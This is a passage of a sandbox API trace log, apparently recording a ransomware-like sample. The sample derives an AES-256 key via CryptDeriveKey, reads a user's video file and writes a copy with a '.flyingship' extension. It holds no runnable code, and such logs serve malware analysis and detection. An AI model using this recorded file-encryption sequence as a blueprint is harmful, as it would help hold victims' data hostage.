wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.644] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0194.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0194.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.645] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0194.645] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0194.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0194.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.646] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0194.646] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.646] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0194.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0194.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.647] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0194.648] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.648] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0194.648] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0194.648] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0194.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.648] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0194.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.648] CryptDestroyHash (hHash=0x90ae18) returned 1 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0194.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0194.649] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0194.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0194.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.651] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.651] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0194.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0194.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0194.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0194.652] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.652] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0194.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0194.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0194.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0194.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0194.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0194.654] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xf4b5, lpOverlapped=0x0) returned 1 [0194.658] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0194.659] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf4b5) returned 0xbea018 [0194.659] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0194.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.660] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0194.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.661] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0194.661] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.662] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0194.662] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.662] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0194.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.662] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2738, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2738*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0194.662] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.662] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0194.663] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.663] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.663] HeapFree (in: 